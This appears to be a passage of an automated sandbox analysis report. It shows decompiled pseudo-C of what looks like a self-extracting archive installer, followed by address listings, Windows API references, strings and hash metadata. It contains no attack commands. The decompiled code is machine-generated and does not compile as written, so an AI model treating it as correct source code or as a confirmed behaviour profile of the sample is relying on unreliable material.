										__eax = EndDialog( *(__ebp + 8), 1);
										goto L115;
									}
								}
								__edx = 0;
								__esi = 0;
								__eflags =  *(__ebp - 0x5c84) - __dx;
								if( *(__ebp - 0x5c84) == __dx) {
									goto L111;
								}
								__ecx = 0;
								__eax = __ebp - 0x5c84;
								while(1) {
									__eflags =  *__eax - 0x40;
									if( *__eax == 0x40) {
										break;
									}
									__esi =  &(__esi->i);
									__eax = __ebp - 0x5c84;
									__ecx = __esi + __esi;
									__eax = __ebp - 0x5c84 + __ecx;
									__eflags =  *__eax - __dx;
									if( *__eax != __dx) {
										continue;
									}
									goto L111;
								}
								__ebp - 0x5c82 = __ebp - 0x5c82 + __ecx;
								__ebp - 0x143c = E0083FAE7(__ebp - 0x143c, __ebp - 0x5c82 + __ecx, 0x200);
								__eax = 0;
								__eflags = 0;
								 *(__ebp + __esi * 2 - 0x5c84) = __ax;
								goto L111;
							case 8:
								__eflags = __ebx - 3;
								if(__ebx == 3) {
									__eflags =  *(__ebp - 0x5c84) - __di;
									if(__eflags != 0) {
										__eax = __ebp - 0x5c84;
										_push(__ebp - 0x5c84);
										__eax = E00856702(__ebx, __edi);
										_pop(__ecx);
										 *0x88de1c = __eax;
									}
									__eax = __ebp + 0xc;
									_push(__ebp + 0xc);
									 *0x88de18 = E0084A321(__ecx, __edx, __eflags);
								}
								 *0x885d03 = 1;
								goto L167;
							case 9:
								__eflags = __ebx - 5;
								if(__ebx != 5) {
									L94:
									 *0x88de20 = 1;
									goto L167;
								}
								_push(1);
								L93:
								__eax = __ebp - 0x5c84;
								_push(__ebp - 0x5c84);
								_push( *(__ebp + 8));
								__eax = E0084C487();
								goto L94;
							case 0xa:
								__eflags = __ebx - 6;
								if(__ebx != 6) {
									goto L167;
								}
								__eax = 0;
								 *(__ebp - 0x2c3c) = __ax;
								__eax =  *(__ebp - 0x1bc8c) & 0x0000ffff;
								__eax = E00855A00( *(__ebp - 0x1bc8c) & 0x0000ffff);
								_push(0x800);
								__eflags = __eax - 0x50;
								if(__eax == 0x50) {
									_push(0x88ad0a);
									__eax = __ebp - 0x2c3c;
									_push(__ebp - 0x2c3c);
									__eax = E0083FAE7();
									 *(__ebp - 0x14) = 2;
								} else {
									__eflags = __eax - 0x54;
									__eax = __ebp - 0x2c3c;
									if(__eflags == 0) {
										_push(0x889d0a);
										_push(__eax);
										__eax = E0083FAE7();
										 *(__ebp - 0x14) = 7;
									} else {
										_push(0x88bd0a);
										_push(__eax);
										__eax = E0083FAE7();
										 *(__ebp - 0x14) = 0x10;
									}
								}
								__eax = 0;
								 *(__ebp - 0x9c8c) = __ax;
								 *(__ebp - 0x1c3c) = __ax;
								__ebp - 0x19c8c = __ebp - 0x6c84;
								__eax = E00854DC3(__ebp - 0x6c84, __ebp - 0x19c8c);
								_pop(__ecx);
								_pop(__ecx);
								_push(0x22);
								_pop(__ebx);
								__eflags =  *(__ebp - 0x6c84) - __bx;
								if( *(__ebp - 0x6c84) != __bx) {
									__ebp - 0x6c84 = E00839F0F(__ebp - 0x6c84);
									__eflags = __al;
									if(__al != 0) {
										goto L152;
									}
									__ebx = __edi;
									__esi = __ebp - 0x6c84;
									__eflags =  *(__ebp - 0x6c84) - __bx;
									if( *(__ebp - 0x6c84) == __bx) {
										goto L152;
									}
									_push(0x20);
									_pop(__ecx);
									do {
										__eax = __esi->i & 0x0000ffff;
										__eflags = __ax - __cx;
										if(__ax == __cx) {
											L140:
											__edi = __eax;
											__eax = 0;
											__esi->i = __ax;
											__ebp - 0x6c84 = E00839F0F(__ebp - 0x6c84);
											__eflags = __al;
											if(__al == 0) {
												__esi->i = __di;
												L148:
												_push(0x20);
												_pop(__ecx);
												__edi = 0;
												__eflags = 0;
												goto L149;
											}
											_push(0x2f);
											_pop(__eax);
											__ebx = __esi;
											__eflags = __di - __ax;
											if(__di != __ax) {
												_push(0x20);
												_pop(__eax);
												do {
													__esi =  &(__esi->i);
													__eflags = __esi->i - __ax;
												} while (__esi->i == __ax);
												_push(__esi);
												__eax = __ebp - 0x1c3c;
												L146:
												_push(__eax);
												__eax = E00854DC3();
												_pop(__ecx);
												_pop(__ecx);
												 *__ebx = __di;
												goto L148;
											}
											 *(__ebp - 0x1c3c) = __ax;
											__eax =  &(__esi->i);
											_push( &(__esi->i));
											__eax = __ebp - 0x1c3a;
											goto L146;
										}
										_push(0x2f);
										_pop(__edx);
										__eflags = __ax - __dx;
										if(__ax != __dx) {
											goto L149;
										}
										goto L140;
										L149:
										__esi =  &(__esi->i);
										__eflags = __esi->i - __di;
									} while (__esi->i != __di);
									__eflags = __ebx;
									if(__ebx != 0) {
										__eax = 0;
										__eflags = 0;
										 *__ebx = __ax;
									}
									goto L152;
								} else {
									__ebp - 0x19c8a = __ebp - 0x6c84;
									E00854DC3(__ebp - 0x6c84, __ebp - 0x19c8a) = __ebp - 0x6c82;
									_push(__ebx);
									_push(__ebp - 0x6c82);
									__eax = E00850BB8(__ecx);
									__esp = __esp + 0x10;
									__eflags = __eax;
									if(__eax != 0) {
										__ecx = 0;
										 *__eax = __cx;
										__ebp - 0x1c3c = E00854DC3(__ebp - 0x1c3c, __ebp - 0x1c3c);
										_pop(__ecx);
										_pop(__ecx);
									}
									L152:
									__eflags =  *(__ebp - 0x11c8c);
									__ebx = 0x800;
									if( *(__ebp - 0x11c8c) != 0) {
										_push(0x800);
										__eax = __ebp - 0x9c8c;
										_push(__ebp - 0x9c8c);
										__eax = __ebp - 0x11c8c;
										_push(__ebp - 0x11c8c);
										__eax = E0083AF74();
									}
									_push(__ebx);
									__eax = __ebp - 0xbc8c;
									_push(__ebp - 0xbc8c);
									__eax = __ebp - 0x6c84;
									_push(__ebp - 0x6c84);
									__eax = E0083AF74();
									__eflags =  *(__ebp - 0x2c3c);
									if(__eflags == 0) {
										__ebp - 0x2c3c = E0084A2C1(__ecx, __ebp - 0x2c3c,  *(__ebp - 0x14));
									}
									__ebp - 0x2c3c = E0083AF49(__eflags, __ebp - 0x2c3c, __ebx);
									__eflags =  *((short*)(__ebp - 0x17c8c));
									if(__eflags != 0) {
										__ebp - 0x17c8c = __ebp - 0x2c3c;
										E0083FABF(__eflags, __ebp - 0x2c3c, __ebp - 0x17c8c, __ebx) = __ebp - 0x2c3c;
										__eax = E0083AF49(__eflags, __ebp - 0x2c3c, __ebx);
									}
									__ebp - 0x2c3c = __ebp - 0xcc8c;
									__eax = E00854DC3(__ebp - 0xcc8c, __ebp - 0x2c3c);
									__eflags =  *(__ebp - 0x13c8c);
									__eax = __ebp - 0x13c8c;
									_pop(__ecx);
									_pop(__ecx);
									if(__eflags == 0) {
										__eax = __ebp - 0x19c8c;
									}
									__ebp - 0x2c3c = E0083FABF(__eflags, __ebp - 0x2c3c, __ebp - 0x2c3c, __ebx);
									__eax = __ebp - 0x2c3c;
									__eflags = E0083B1F0(__ebp - 0x2c3c);
									if(__eflags == 0) {
										L162:
										__ebp - 0x2c3c = E0083FABF(__eflags, __ebp - 0x2c3c, L".lnk", __ebx);
										goto L163;
									} else {
										__eflags = __eax;
										if(__eflags == 0) {
											L163:
											_push(1);
											__eax = __ebp - 0x2c3c;
											_push(__ebp - 0x2c3c);
											E00839DDE(__ecx, __ebp) = __ebp - 0xbc8c;
											__ebp - 0xac8c = E00854DC3(__ebp - 0xac8c, __ebp - 0xbc8c);
											_pop(__ecx);
											_pop(__ecx);
											__ebp - 0xac8c = E0083BA2A(__eflags, __ebp - 0xac8c);
											__ecx =  *(__ebp - 0x1c3c) & 0x0000ffff;
											__eax = __ebp - 0x1c3c;
											__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff);
											__edx = __ebp - 0x9c8c;
											__esi = __ebp - 0xac8c;
											asm("sbb ecx, ecx");
											__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c;
											 *(__ebp - 0x9c8c) & 0x0000ffff =  ~( *(__ebp - 0x9c8c) & 0x0000ffff);
											asm("sbb eax, eax");
											__eax =  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c;
											 *(__ebp - 0xac8c) & 0x0000ffff =  ~( *(__ebp - 0xac8c) & 0x0000ffff);
											__eax = __ebp - 0x15c8c;
											asm("sbb edx, edx");
											__edx =  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi;
											E00849DB4(__ebp - 0x15c8c) = __ebp - 0x2c3c;
											__ebp - 0xbc8c = E008494C3(__ecx, __edi, __ebp - 0xbc8c, __ebp - 0x2c3c,  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi, __ebp - 0xbc8c,  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c,  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c);
											__eflags =  *(__ebp - 0xcc8c);
											if( *(__ebp - 0xcc8c) != 0) {
												_push(__edi);
												__eax = __ebp - 0xcc8c;
												_push(__ebp - 0xcc8c);
												_push(5);
												_push(0x1000);
												__eax =  *0x86def8();
											}
											goto L167;
										}
										goto L162;
									}
								}
							case 0xb:
								__eflags = __ebx - 7;
								if(__ebx == 7) {
									 *0x879600 = 1;
								}
								goto L167;
							case 0xc:
								__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
								__eax = E00855A00( *(__ebp - 0x5c84) & 0x0000ffff);
								__eflags = __eax - 0x46;
								if(__eax == 0x46) {
									 *0x8775f1 = 1;
								} else {
									__eflags = __eax - 0x55;
									if(__eax == 0x55) {
										 *0x8775f2 = 1;
									} else {
										__eax = 0;
										 *0x8775f1 = __al;
										 *0x8775f2 = __al;
									}
								}
								goto L167;
							case 0xd:
								 *0x88de21 = 1;
								__eax = __eax + 0x88de21;
								_t112 = __esi + 0x39;
								 *_t112 =  *(__esi + 0x39) + __esp;
								__eflags =  *_t112;
								__ebp = 0xffffa37c;
								if( *_t112 != 0) {
									_t114 = __ebp - 0x5c84; // 0xffff46f8
									__eax = _t114;
									_push(_t114);
									 *0x86d5fc = E00841424();
								}
								goto L167;
						}
						L4:
						_t220 = E00849E97(_t220, _t297);
						_t297 = _t297 + 0x2000;
						_t294 = _t294 - 1;
						if(_t294 != 0) {
							goto L4;
						} else {
							_t298 = _t294;
							goto L6;
						}
						L167:
						_push(0x1000);
						_t205 = _t303 - 0xe; // 0xffffa36e
						_t206 = _t303 - 0xd; // 0xffffa36f
						_t207 = _t303 - 0x5c84; // 0xffff46f8
						_t208 = _t303 - 0xfc8c; // 0xfffea6f0
						_push( *((intOrPtr*)(_t303 + 0xc)));
						_t215 = E0084A1C9();
						_t278 =  *((intOrPtr*)(_t303 + 0x10));
						 *((intOrPtr*)(_t303 + 0xc)) = _t215;
					} while (_t215 != 0);
				}
			}

0x0084b522
0x0084b527
0x0084b52c
0x0084b531
0x0084b53a
0x0084c122
0x0084c125
0x0084c12f
0x0084c12f
0x0084b540
0x0084b548
0x0084b54c
0x0084b553
0x0084b55a
0x0084b55b
0x0084b55e
0x0084b565
0x0084b56a
0x0084b571
0x0084b576
0x0084b578
0x0084b57e
0x0084b584
0x0084b584
0x00000000
0x0084b599
0x0084b5b0
0x0084b5b4
0x00000000
0x0084b5b6
0x00000000
0x0084b5b6
0x0084b5b4
0x0084b5be
0x00000000
0x00000000
0x0084b5c4
0x00000000
0x0084b5cb
0x0084b5ce
0x00000000
0x00000000
0x0084b5d4
0x0084b5e1
0x0084b607
0x0084b612
0x0084b61c
0x0084b627
0x0084b62c
0x0084b634
0x0084b63a
0x0084b63f
0x0084b641
0x0084b7a6
0x0084b7a6
0x0084b7b0
0x00000000
0x0084b647
0x0084b64d
0x0084b66f
0x0084b67e
0x0084b68b
0x0084b69c
0x0084b69f
0x0084b6a2
0x0084b6b5
0x0084b6bc
0x0084b6c1
0x0084b6c3
0x00000000
0x00000000
0x0084b6c9
0x0084b6d0
0x0084b6d5
0x0084b6da
0x0084b6e6
0x0084b6eb
0x0084b6ee
0x0084b6f5
0x0084b6f7
0x0084b6f8
0x0084b702
0x0084b708
0x0084b709
0x00000000
0x0084b709
0x0084b6ab
0x0084b6b1
0x0084b6b3
0x00000000
0x00000000
0x00000000
0x0084b70f
0x0084b716
0x0084b718
0x0084b71b
0x0084b78b
0x0084b78b
0x0084b793
0x0084b799
0x0084b79e
0x0084b7a0
0x0084b64f
0x0084b654
0x0084b65c
0x0084b662
0x0084b669
0x00000000
0x00000000
0x00000000
0x0084b669
0x00000000
0x0084b7a0
0x0084b724
0x0084b72a
0x0084b72c
0x00000000
0x0084b72e
0x0084b72e
0x0084b730
0x0084b731
0x0084b735
0x0084b74d
0x0084b752
0x0084b75c
0x0084b75e
0x0084b761
0x0084b733
0x0084b733
0x0084b734
0x00000000
0x0084b763
0x0084b771
0x0084b777
0x0084b779
0x0084b785
0x0084b785
0x00000000
0x0084b779
0x0084b761
0x0084b72c
0x00000000
0x0084b7ba
0x0084b7bc
0x0084b80f
0x0084b814
0x0084b81d
0x0084b81e
0x0084b824
0x0084b829
0x0084b82c
0x0084b82e
0x0084b830
0x0084b835
0x0084b837
0x0084b839
0x0084b839
0x0084b83b
0x0084b83b
0x0084b840
0x0084b845
0x0084b846
0x0084b846
0x0084b847
0x0084b849
0x0084b850
0x0084b855
0x0084b849
0x00000000
0x00000000
0x0084b85b
0x0084b85d
0x0084b86d
0x0084b86d
0x00000000
0x00000000
0x0084b878
0x0084b87a
0x00000000
0x00000000
0x0084b880
0x0084b887
0x00000000
0x00000000
0x0084b88d
0x0084b88f
0x0084b895
0x0084b897
0x0084b89e
0x0084b89f
0x0084b8a6
0x0084b8a8
0x0084b8a8
0x0084b8af
0x0084b8b4
0x0084b8ba
0x0084b8bc
0x00000000
0x0084b8c2
0x0084b8c2
0x0084b8c5
0x0084b8c7
0x0084b8c8
0x0084b8cb
0x0084b8f4
0x0084b8f4
0x0084b8f7
0x0084b9dc
0x0084b9e5
0x0084b9ea
0x0084b9ea
0x0084b9ec
0x0084b9ec
0x0084b9ee
0x0084b9f0
0x0084b9f7
0x0084b9fc
0x0084b9fd
0x0084b9fe
0x0084ba00
0x0084ba02
0x0084ba06
0x0084ba08
0x0084ba08
0x0084ba0a
0x0084ba0a
0x0084ba06
0x0084ba0e
0x0084ba14
0x0084ba21
0x0084ba28
0x0084ba38
0x0084ba42
0x0084ba4a
0x0084ba56
0x0084ba58
0x0084ba60
0x0084ba65
0x0084ba66
0x0084ba67
0x0084ba69
0x0084ba76
0x0084ba7f
0x0084ba7f
0x00000000
0x0084ba69
0x0084b8fd
0x0084b900
0x0084b90d
0x0084b90d
0x0084b910
0x0084b912
0x0084b913
0x0084b915
0x0084b916
0x0084b91b
0x0084b920
0x0084b926
0x0084b928
0x0084b92a
0x0084b92d
0x0084b934
0x0084b935
0x0084b93b
0x0084b93c
0x0084b93f
0x0084b940
0x0084b941
0x0084b946
0x0084b949
0x0084b94f
0x0084b958
0x0084b95b
0x0084b960
0x0084b962
0x0084b964
0x0084b966
0x0084b966
0x0084b968
0x0084b968
0x0084b96a
0x0084b96a
0x0084b972
0x0084b979
0x0084b97b
0x0084b982
0x0084b988
0x0084b98a
0x0084b98b
0x0084b993
0x0084b9a2
0x0084b9a2
0x0084b993
0x0084b9ad
0x0084b9af
0x0084b9be
0x0084b9c4
0x0084b9ca
0x0084b9d5
0x0084b9d5
0x00000000
0x0084b9ca
0x0084b902
0x0084b907
0x00000000
0x00000000
0x00000000
0x0084b907
0x0084b8cd
0x0084b8d1
0x00000000
0x00000000
0x0084b8d3
0x0084b8d6
0x0084b8d8
0x0084b8db
0x00000000
0x0084b8e1
0x0084b8ea
0x00000000
0x0084b8ea
0x0084b8db
0x00000000
0x0084ba86
0x0084ba87
0x0084ba8c
0x0084ba8e
0x0084ba91
0x0084ba91
0x00000000
0x0084bac7
0x0084bace
0x0084bad0
0x0084bad0
0x0084bad2
0x0084bb01
0x0084bb01
0x0084bb07
0x00000000
0x0084bb07
0x0084bad4
0x0084bad4
0x0084bad7
0x0084baf0
0x0084baf6
0x0084baf6
0x00000000
0x0084baf6
0x0084bad9
0x0084bad9
0x0084badc
0x00000000
0x00000000
0x0084bade
0x0084bade
0x0084bae1
0x00000000
0x00000000
0x0084bae7
0x00000000
0x00000000
0x0084bb54
0x0084bb57
0x00000000
0x00000000
0x0084bb59
0x0084bb65
0x0084bb6a
0x0084bb6b
0x0084bb6c
0x0084bb6e
0x00000000
0x00000000
0x0084bb70
0x00000000
0x00000000
0x0084bbb6
0x0084bbb9
0x0084bd3a
0x0084bd3a
0x0084bd3d
0x0084bd43
0x0084bd4a
0x0084bd4c
0x0084bd4c
0x0084bd56
0x0084bd56
0x00000000
0x0084bd3d
0x0084bbbf
0x0084bbc5
0x0084bbd3
0x0084bbdf
0x0084bbe1
0x0084bbe3
0x0084bbe8
0x0084bbe8
0x0084bc00
0x0084bc0d
0x0084bc12
0x0084bc14
0x00000000
0x00000000
0x0084bbe6
0x0084bbe6
0x0084bbe7
0x0084bbe7
0x0084bc20
0x0084bc26
0x0084bc2e
0x00000000
0x00000000
0x0084bc34
0x0084bc3b
0x00000000
0x00000000
0x0084bc41
0x0084bc43
0x0084bc4a
0x0084bc50
0x0084bc52
0x0084bc53
0x0084bc58
0x0084bc59
0x0084bc5a
0x0084bc5c
0x0084bcb0
0x0084bcb0
0x0084bcb8
0x0084bcc6
0x0084bcd7
0x0084bce5
0x0084bce5
0x0084bcf1
0x0084bcf6
0x0084bcf8
0x0084bd08
0x0084bd12
0x0084bd17
0x0084bd1a
0x00000000
0x0084bd20
0x0084bd25
0x0084bd25
0x0084bd27
0x0084bd2e
0x0084bd34
0x00000000
0x0084bd34
0x0084bd1a
0x0084bc5e
0x0084bc60
0x0084bc62
0x0084bc69
0x00000000
0x00000000
0x0084bc6b
0x0084bc6d
0x0084bc73
0x0084bc73
0x0084bc77
0x00000000
0x00000000
0x0084bc79
0x0084bc7a
0x0084bc80
0x0084bc83
0x0084bc85
0x0084bc88
0x00000000
0x00000000
0x00000000
0x0084bc8a
0x0084bc97
0x0084bca1
0x0084bca6
0x0084bca6
0x0084bca8
0x00000000
0x00000000
0x0084bd62
0x0084bd65
0x0084bd67
0x0084bd6e
0x0084bd70
0x0084bd76
0x0084bd77
0x0084bd7c
0x0084bd7d
0x0084bd7d
0x0084bd82
0x0084bd85
0x0084bd8b
0x0084bd8b
0x0084bd90
0x00000000
0x00000000
0x0084bd9c
0x0084bd9f
0x0084bb80
0x0084bb80
0x00000000
0x0084bb80
0x0084bda5
0x0084bb71
0x0084bb71
0x0084bb77
0x0084bb78
0x0084bb7b
0x00000000
0x00000000
0x0084bdac
0x0084bdaf
0x00000000
0x00000000
0x0084bdb5
0x0084bdb7
0x0084bdbe
0x0084bdc6
0x0084bdcc
0x0084bdd1
0x0084bdd4
0x0084be09
0x0084be0e
0x0084be14
0x0084be15
0x0084be1a
0x0084bdd6
0x0084bdd6
0x0084bdd9
0x0084bddf
0x0084bdf5
0x0084bdfa
0x0084bdfb
0x0084be00
0x0084bde1
0x0084bde1
0x0084bde6
0x0084bde7
0x0084bdec
0x0084bdec
0x0084bddf
0x0084be21
0x0084be23
0x0084be2a
0x0084be38
0x0084be3f
0x0084be44
0x0084be45
0x0084be46
0x0084be48
0x0084be49
0x0084be50
0x0084bea0
0x0084bea5
0x0084bea7
0x00000000
0x00000000
0x0084bead
0x0084beaf
0x0084beb5
0x0084bebc
0x00000000
0x00000000
0x0084bebe
0x0084bec0
0x0084bec1
0x0084bec1
0x0084bec4
0x0084bec7
0x0084bed1
0x0084bed1
0x0084bed3
0x0084bed5
0x0084bedf
0x0084bee4
0x0084bee6
0x0084bf24
0x0084bf27
0x0084bf27
0x0084bf29
0x0084bf2a
0x0084bf2a
0x00000000
0x0084bf2a
0x0084bee8
0x0084beea
0x0084beeb
0x0084beed
0x0084bef0
0x0084bf05
0x0084bf07
0x0084bf08
0x0084bf08
0x0084bf0b
0x0084bf0b
0x0084bf10
0x0084bf11
0x0084bf17
0x0084bf17
0x0084bf18
0x0084bf1d
0x0084bf1e
0x0084bf1f
0x00000000
0x0084bf1f
0x0084bef2
0x0084bef9
0x0084befc
0x0084befd
0x00000000
0x0084befd
0x0084bec9
0x0084becb
0x0084becc
0x0084becf
0x00000000
0x00000000
0x00000000
0x0084bf2c
0x0084bf2c
0x0084bf2f
0x0084bf2f
0x0084bf34
0x0084bf36
0x0084bf38
0x0084bf38
0x0084bf3a
0x0084bf3a
0x00000000
0x0084be52
0x0084be59
0x0084be65
0x0084be6b
0x0084be6c
0x0084be6d
0x0084be72
0x0084be75
0x0084be77
0x0084be7d
0x0084be7f
0x0084be8d
0x0084be92
0x0084be93
0x0084be93
0x0084bf3d
0x0084bf3d
0x0084bf45
0x0084bf4a
0x0084bf4c
0x0084bf4d
0x0084bf53
0x0084bf54
0x0084bf5a
0x0084bf5b
0x0084bf5b
0x0084bf60
0x0084bf61
0x0084bf67
0x0084bf68
0x0084bf6e
0x0084bf6f
0x0084bf74
0x0084bf7c
0x0084bf88
0x0084bf88
0x0084bf95
0x0084bf9a
0x0084bfa2
0x0084bfac
0x0084bfb9
0x0084bfc0
0x0084bfc0
0x0084bfcc
0x0084bfd3
0x0084bfd8
0x0084bfe0
0x0084bfe6
0x0084bfe7
0x0084bfe8
0x0084bfea
0x0084bfea
0x0084bfff
0x0084c004
0x0084c010
0x0084c012
0x0084c023
0x0084c030
0x00000000
0x0084c014
0x0084c01f
0x0084c021
0x0084c035
0x0084c035
0x0084c037
0x0084c03d
0x0084c043
0x0084c051
0x0084c056
0x0084c057
0x0084c05f
0x0084c064
0x0084c06b
0x0084c071
0x0084c073
0x0084c079
0x0084c07f
0x0084c081
0x0084c08a
0x0084c08d
0x0084c08f
0x0084c098
0x0084c09b
0x0084c0a1
0x0084c0a4
0x0084c0ad
0x0084c0bc
0x0084c0c1
0x0084c0c9
0x0084c0cb
0x0084c0cc
0x0084c0d2
0x0084c0d3
0x0084c0d5
0x0084c0da
0x0084c0da
0x00000000
0x0084c0c9
0x00000000
0x0084c021
0x0084c012
0x00000000
0x0084c0e2
0x0084c0e5
0x0084c0e7
0x0084c0e7
0x00000000
0x00000000
0x0084bb13
0x0084bb1b
0x0084bb21
0x0084bb24
0x0084bb48
0x0084bb26
0x0084bb26
0x0084bb29
0x0084bb3c
0x0084bb2b
0x0084bb2b
0x0084bb2d
0x0084bb32
0x0084bb32
0x0084bb29
0x00000000
0x00000000
0x0084bb8c
0x0084bb8d
0x0084bb92
0x0084bb92
0x0084bb92
0x0084bb95
0x0084bb9a
0x0084bba0
0x0084bba0
0x0084bba6
0x0084bbac
0x0084bbac
0x00000000
0x00000000
0x0084b585
0x0084b587
0x0084b58c
0x0084b592
0x0084b595
0x00000000
0x0084b597
0x0084b597
0x00000000
0x0084b597
0x0084c0ee
0x0084c0ee
0x0084c0f3
0x0084c0f7
0x0084c0fb
0x0084c102
0x0084c109
0x0084c10c
0x0084c111
0x0084c114
0x0084c117
0x0084c121

APIs

__EH_prolog.LIBCMT ref: 0084B527

Part of subcall function 0084A1C9: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0084A291

SetFileAttributesW.KERNEL32(?,00000005,?,?,?,00000800,?,?,00000000,00000001,0084AE3A,?,00000000), ref: 0084B65C
GetFileAttributesW.KERNEL32(?), ref: 0084B716
DeleteFileW.KERNEL32(?), ref: 0084B724
SetWindowTextW.USER32(?,?), ref: 0084B86D
_wcsrchr.LIBVCRUNTIME ref: 0084B9F7
GetDlgItem.USER32(?,00000066), ref: 0084BA32
SetWindowTextW.USER32(00000000,?), ref: 0084BA42
SendMessageW.USER32(00000000,00000143,00000000,00879602), ref: 0084BA56
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0084BA7F

Strings

<br>, xrefs: 0084B7D0
%s.%d.tmp, xrefs: 0084B73C
ProgramFilesDir, xrefs: 0084B941
Software\Microsoft\Windows\CurrentVersion, xrefs: 0084B916

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AttributesMessageSendTextWindow$DeleteEnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 3676479488-312220925
Opcode ID: 94ecad411c6790aca22fae9bbf64dd84596c6f63bbd845db5f9065e78d7c9510
Instruction ID: 067c600dddbd3572eef5071024db9733dc6cd1711eeeacadb34d1b6ec960df82
Opcode Fuzzy Hash: 94ecad411c6790aca22fae9bbf64dd84596c6f63bbd845db5f9065e78d7c9510
Instruction Fuzzy Hash: CDE15C7290021DAAEF24ABA4DD85DEE777CFB44350F0041A6F919E7051EF749B848BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0083D019, Relevance: 23.3, APIs: 4, Strings: 9, Instructions: 557
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0083D019(signed int __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t196;
				void* _t197;
				WCHAR* _t198;
				void* _t203;
				signed int _t212;
				signed int _t215;
				signed int _t218;
				signed int _t228;
				void* _t229;
				void* _t232;
				signed int _t235;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t244;
				signed int _t248;
				signed int _t262;
				signed int _t267;
				signed int _t268;
				signed int _t270;
				signed int _t272;
				signed int _t273;
				void* _t274;
				signed int _t279;
				char* _t280;
				signed int _t284;
				short _t287;
				void* _t288;
				signed int _t294;
				signed int _t299;
				void* _t302;
				void* _t304;
				void* _t307;
				signed int _t316;
				unsigned int _t328;
				signed int _t330;
				unsigned int _t333;
				signed int _t336;
				void* _t343;
				signed int _t348;
				signed int _t351;
				signed int _t352;
				signed int _t357;
				signed int _t361;
				void* _t370;
				signed int _t372;
				signed int _t373;
				void* _t374;
				void* _t375;
				intOrPtr* _t376;
				signed int _t377;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int _t387;
				signed int _t389;
				signed int* _t390;
				void* _t391;
				void* _t392;
				void* _t394;
				void* _t398;
				void* _t399;

				_t370 = __edx;
				_t392 = _t391 - 0x6c;
				E0084D8C4(E00861463, __ecx);
				E0084D9C0();
				_t196 = 0x5c;
				_push(0x427c);
				_push(_t390[0x1e]);
				_t387 = __ecx;
				_t390[0x11] = _t196;
				_t390[0x12] = __ecx;
				_t197 = E00850BB8(__ecx);
				_t316 = 0;
				_t396 = _t197;
				_t198 = _t390 - 0x1264;
				if(_t197 != 0) {
					E0083FAE7(_t198, _t390[0x1e], 0x800);
				} else {
					GetModuleFileNameW(0, _t198, 0x800);
					 *((short*)(E0083B9E0(_t396, _t390 - 0x1264))) = 0;
					E0083FABF(_t396, _t390 - 0x1264, _t390[0x1e], 0x800);
				}
				E008394D4(_t390 - 0x2288);
				_push(4);
				 *(_t390 - 4) = _t316;
				_push(_t390 - 0x1264);
				if(E0083980C(_t390 - 0x2288, _t387) == 0) {
					L57:
					_t203 = E00839506(_t390 - 0x2288); // executed
					 *[fs:0x0] =  *((intOrPtr*)(_t390 - 0xc));
					return _t203;
				} else {
					_t380 = _t316;
					_t398 =  *0x86d5f4 - _t380; // 0x63
					if(_t398 <= 0) {
						L7:
						E00855070(_t316, _t380, _t387,  *_t387,  *((intOrPtr*)(_t387 + 4)), 4, E0083CCB4);
						E00855070(_t316, _t380, _t387,  *((intOrPtr*)(_t387 + 0x14)),  *((intOrPtr*)(_t387 + 0x18)), 4, E0083CC19);
						_t394 = _t392 + 0x20;
						_t390[0x1e] = _t316;
						_t381 = _t380 | 0xffffffff;
						_t390[0x16] = _t316;
						_t390[0x19] = _t381;
						while(_t381 == 0xffffffff) {
							_t390[0x1b] = E00839BFB();
							_t294 = E00839A1D(_t370, _t390 - 0x4288, 0x2000);
							_t390[0x17] = _t294;
							_t384 = _t316;
							_t25 = _t294 - 0x10; // -16
							_t361 = _t25;
							_t390[0x15] = _t361;
							if(_t361 < 0) {
								L25:
								_t295 = _t390[0x1b];
								_t381 = _t390[0x19];
								L26:
								E00839AF0(_t390 - 0x2288, _t390, _t295 + _t390[0x17] + 0xfffffff0, _t316, _t316);
								_t299 = _t390[0x16] + 1;
								_t390[0x16] = _t299;
								__eflags = _t299 - 0x100;
								if(_t299 < 0x100) {
									continue;
								}
								__eflags = _t381 - 0xffffffff;
								if(_t381 == 0xffffffff) {
									goto L57;
								}
								break;
							}
							L10:
							while(1) {
								if( *((char*)(_t390 + _t384 - 0x4288)) != 0x2a ||  *((char*)(_t390 + _t384 - 0x4287)) != 0x2a) {
									L14:
									_t370 = 0x2a;
									if( *((intOrPtr*)(_t390 + _t384 - 0x4288)) != _t370) {
										L18:
										if( *((char*)(_t390 + _t384 - 0x4288)) != 0x52 ||  *((char*)(_t390 + _t384 - 0x4287)) != 0x61) {
											L21:
											_t384 = _t384 + 1;
											if(_t384 > _t390[0x15]) {
												goto L25;
											}
											_t294 = _t390[0x17];
											continue;
										} else {
											_t302 = E008554A0(_t390 - 0x4286 + _t384, 0x862620, 4);
											_t394 = _t394 + 0xc;
											if(_t302 == 0) {
												goto L57;
											}
											goto L21;
										}
									}
									_t366 = _t390 - 0x4284 + _t384;
